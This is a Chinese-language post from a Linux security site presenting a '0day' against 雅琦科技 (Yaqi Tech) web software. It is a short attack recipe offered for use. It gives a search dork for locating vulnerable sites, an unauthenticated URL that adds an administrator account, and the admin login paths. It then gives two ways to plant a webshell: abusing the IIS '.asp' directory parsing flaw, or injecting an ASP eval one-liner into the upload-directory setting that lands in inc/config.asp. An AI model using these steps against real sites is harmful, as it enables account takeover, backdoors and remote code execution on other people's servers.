Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

雅琦科技程序0day

来源: 未知 分享至:

作者:Sniff3r & lan3a

关键字:inurl:ShowInfo.asp?ShowId=

找到网站后然后在网站地址后加上:admin/User_Manage.asp?action=UserAdd

进去添加一个管理员,然后用添加的账户登录。
/admin/Yqlogin.asp
/admin/admin_main.asp

后台拿Webshell有2个方法。

1.在上传目录那里 添加1.asp,利用IIS的解析漏洞。
2.在上传目录那里 写上
"%><%eval request("a")%><%'
然后访问配置文件 inc/config.asp


最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史